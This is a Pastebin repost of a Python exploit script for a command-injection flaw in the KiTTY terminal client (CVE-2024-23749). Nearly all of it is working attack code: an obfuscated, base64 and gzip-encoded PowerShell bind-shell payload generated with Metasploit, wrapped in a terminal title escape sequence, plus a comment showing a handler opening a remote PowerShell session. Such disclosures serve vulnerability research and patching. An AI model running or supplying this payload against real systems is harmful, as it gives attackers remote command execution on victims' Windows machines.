FlyFar

KiTTY 0.76.1.13 - Command Injection - CVE-2024-23749

Mar 14th, 2024
31
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.58 KB | Cybersecurity | 0 0
  1. # Exploit Title: KiTTY 0.76.1.13 - Command Injection
  2. # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
  3. # Vendor Homepage: https://github.com/cyd01/KiTTY/=
  4. # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
  5. # Version: ≤ 0.76.1.13
  6. # Tested on: Microsoft Windows 11/10/8/7/XP
  7. # CVE: CVE-2024-23749
  8. #-------------------------------------------------------------------------------------#
  9. # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
  10. #-------------------------------------------------------------------------------------#
  11. # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             #
  12. # [*] Payload Handler Started as Job 1                                                   #
  13. # msf6 payload(cmd/windows/powershell_bind_tcp) >                                        #
  14. # [*] Started bind TCP handler against 192.168.100.28:4444                               #
  15. # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
  16. #----------------------------------------------------------------------------------------#
  17.  
  18. import os
  19. import sys
  20.  
  21. #-----------------------------------------------------------------#
  22. # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
  23. #-----------------------------------------------------------------#
  24.  
  25. shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
  26. shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
  27. shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
  28. shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
  29. shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
  30. shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
  31. shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
  32. shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'
  33. shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
  34. shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
  35. shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
  36. shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
  37. shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'
  38. shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'
  39. shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'
  40. shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'
  41. shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
  42. shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
  43. shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'
  44. shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
  45. shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
  46. shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'
  47. shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'
  48. shellcode += b'ess))).ReadToEnd()))\"'
  49.  
  50. escape_sequence = b'\033]0;__rv:'
  51. escape_sequence += b'" & '
  52. escape_sequence += shellcode
  53. escape_sequence += b' #\007'
  54.  
  55. stdout = os.fdopen(sys.stdout.fileno(), 'wb')
  56. stdout.write(escape_sequence)
  57. stdout.flush()
  58.            
Add Comment
Please, Sign In to add comment